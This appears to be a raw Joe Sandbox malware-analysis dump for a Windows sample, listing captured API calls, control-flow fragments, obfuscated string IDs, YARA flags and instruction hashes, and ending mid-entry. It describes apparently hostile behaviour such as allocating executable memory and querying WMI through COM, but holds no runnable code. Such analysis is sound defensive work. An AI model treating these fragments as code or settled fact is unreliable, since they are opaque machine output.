                                  control_flow_graph 229 9f0e0f-9f0e24 SetErrorMode * 2 230 9f0e2b-9f0e2c 229->230 231 9f0e26 229->231 231->230
                                  APIs
                                  • SetErrorMode.KERNELBASE(00000400,?,?,009F0223,?,?), ref: 009F0E19
                                  • SetErrorMode.KERNELBASE(00000000,?,?,009F0223,?,?), ref: 009F0E1E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                  • Instruction ID: 0e5b8a931112bee576b3e274b015f74f183d26d529e2547c9a4b8bb33545403c
                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                  • Instruction Fuzzy Hash: EED0123264522CB7DB002A94DC09BDEBB1CDF09BA2F008421FB0DE9081CBB09A4047EA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 232 40e71a-40e738 CoUninitialize * 2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: Uninitialize
                                  • String ID:
                                  • API String ID: 3861434553-0
                                  • Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                  • Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
                                  • Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
                                  • Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 233 43c2c8-43c2d6 234 43c2e0-43c2fd 233->234 234->234 235 43c2ff-43ccb9 GetForegroundWindow call 43e110 234->235 238 43ccbe-43ccdf 235->238
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 0043CCAF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: ForegroundWindow
                                  • String ID:
                                  • API String ID: 2020703349-0
                                  • Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                  • Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
                                  • Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
                                  • Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 239 40c550-40c580 CoInitializeEx
                                  APIs
                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: Initialize
                                  • String ID:
                                  • API String ID: 2538663250-0
                                  • Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                  • Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
                                  • Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
                                  • Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 240 40c583-40c5b2 CoInitializeSecurity
                                  APIs
                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: InitializeSecurity
                                  • String ID:
                                  • API String ID: 640775948-0
                                  • Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                  • Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
                                  • Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
                                  • Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 242 43aaa0-43aaac 243 43aab3-43aabe call 43d810 RtlFreeHeap 242->243 244 43aac4-43aac5 242->244 243->244
                                  APIs
                                  • RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                  • Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
                                  • Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
                                  • Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 247 43aa80-43aa97 call 43d810 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                  • Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
                                  • Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
                                  • Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8
                                  APIs
                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00AF9CC6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913597436.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_af9000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                  • Instruction ID: dd19d58b6f7e690099ee2bb766952ec5166c1fb7654b2dca783c6bf6bb81f4b2
                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                  • Instruction Fuzzy Hash: A1113C79A00208EFDB01DF98CA85E99BFF5AF08350F158094FA489B362D771EA50DF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                  • API String ID: 0-561599860
                                  • Opcode ID: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                  • Instruction ID: 62b804846b12554c964fb27047bb6f29388b79bf65c94f31d1527742f692db91
                                  • Opcode Fuzzy Hash: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
                                  • Instruction Fuzzy Hash: A813A93150C7C48AD3358B38D4583AFBBE1ABD6324F188A6DE5E9873C2C6798945CB53
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
                                  • API String ID: 0-561599860
                                  • Opcode ID: d9ba1a141e1c252aa0639563dea27da91275ec820e05fdca1cc4e30b20f87440
                                  • Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
                                  • Opcode Fuzzy Hash: d9ba1a141e1c252aa0639563dea27da91275ec820e05fdca1cc4e30b20f87440
                                  • Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                  • API String ID: 0-168325148
                                  • Opcode ID: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                  • Instruction ID: 771675bc1490ba0a0a2c0ac37a24168c56b45f2c669ed4c3770bb47e8f0c5e0a
                                  • Opcode Fuzzy Hash: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
                                  • Instruction Fuzzy Hash: F0D1AD2090C7E98EDB22C77C885478DBFA15B67324F1882D8D4E96B3D2C3B94946C766
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
                                  • API String ID: 0-168325148
                                  • Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                  • Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
                                  • Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
                                  • Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
                                  • API String ID: 0-3492884535
                                  • Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                  • Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                  • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                  • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                  APIs
                                  • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                  • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                  • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                  • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                  • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                  • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                  • VariantClear.OLEAUT32(?), ref: 004383F9
                                  • SysFreeString.OLEAUT32(?), ref: 0043841D
                                  • SysFreeString.OLEAUT32(?), ref: 00438423
                                  • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                  • String ID: P%R$)\"^$.H4J$O@$pq
                                  • API String ID: 2485776651-1397720406
                                  • Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                  • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                  • Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                  • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
                                  • API String ID: 0-2608794092
                                  • Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                  • Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
                                  • Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                  • Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                  • API String ID: 0-1300133108
                                  • Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                  • Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
                                  • Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                  • Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                  • API String ID: 0-1893782281
                                  • Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                  • Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
                                  • Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                  • Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$hi$o#M%$pIrK
                                  • API String ID: 0-2118368390
                                  • Opcode ID: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                  • Instruction ID: 69c9cd0e41d53440a91eec7fe44bdcc698ff496b82a4bf6ebc538a0d78fd8e99
                                  • Opcode Fuzzy Hash: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                  • Instruction Fuzzy Hash: D132FCB484A3698ADBA5CF5599883CDBB71FB51304F2082D8C46D3B264DBB50BC6CF85
                                  APIs
                                  • CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 00A2829B
                                  • SysAllocString.OLEAUT32()\"^), ref: 00A2832A
                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00A28368
                                  • SysAllocString.OLEAUT32()\"^), ref: 00A283E5
                                  • SysAllocString.OLEAUT32()\"^), ref: 00A2849F
                                  • VariantInit.OLEAUT32(C7C6C5CC), ref: 00A2850F
                                  • VariantClear.OLEAUT32(?), ref: 00A28660
                                  • SysFreeString.OLEAUT32(00000000), ref: 00A28697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
                                  • String ID: P%R$)\"^$.H4J$O@$pq
                                  • API String ID: 2775254435-1397720406
                                  • Opcode ID: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
                                  • Instruction ID: 5d9ce0a6f44cac78b171b800cd6aba04e5c96111ae7625623b0daa62a3a586ee
                                  • Opcode Fuzzy Hash: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
                                  • Instruction Fuzzy Hash: D222F0B2A493508FD310CF28D880B6BBBE5EFC5704F148A2CF5959B281DB79D905CB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                  • API String ID: 0-1290103930
                                  • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                  • Instruction ID: dbd48e77a80240254534c9afa026a85dbbc6acdf810fc3481d25a32bf2ec796a
                                  • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                  • Instruction Fuzzy Hash: FFA1E47020C3D58BC316CF6984A076BBFE1AF97754F184AACE5D58B342D73A890AC752
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                  • API String ID: 0-1290103930
                                  • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                  • Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
                                  • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                  • Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                  • API String ID: 0-1763234448
                                  • Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                  • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                  • Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                  • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                  APIs
                                    • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                  • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                  • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID: FreeLibrary$InitializeThunk
                                  • String ID: / $/,-$Wu$46
                                  • API String ID: 764372645-3330591033
                                  • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                  • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                  • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                  • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1912804014.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1912804014.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_iOnDpwrkWY.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                  • API String ID: 0-1826372655
                                  • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                  • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                  • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                  • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: / $/,-$46
                                  • API String ID: 3664257935-479303636
                                  • Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                  • Instruction ID: 0564bd379dfb07931e30c40085cc1565e0e8c6ce8a53c5f1deddda909e979468
                                  • Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                  • Instruction Fuzzy Hash: B3B256766483449FE3208B95E884B6FBBE2ABE5300F1CC82DE5849B291D7759C458B93
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_9f0000_iOnDpwrkWY.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                  • API String ID: 0-2463461626
                                  • Opcode ID: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                  • Instruction ID: 56816fba52dd334ae0ad598bdd9fa1e851c42b698b7dc4899cd22cd241057d58
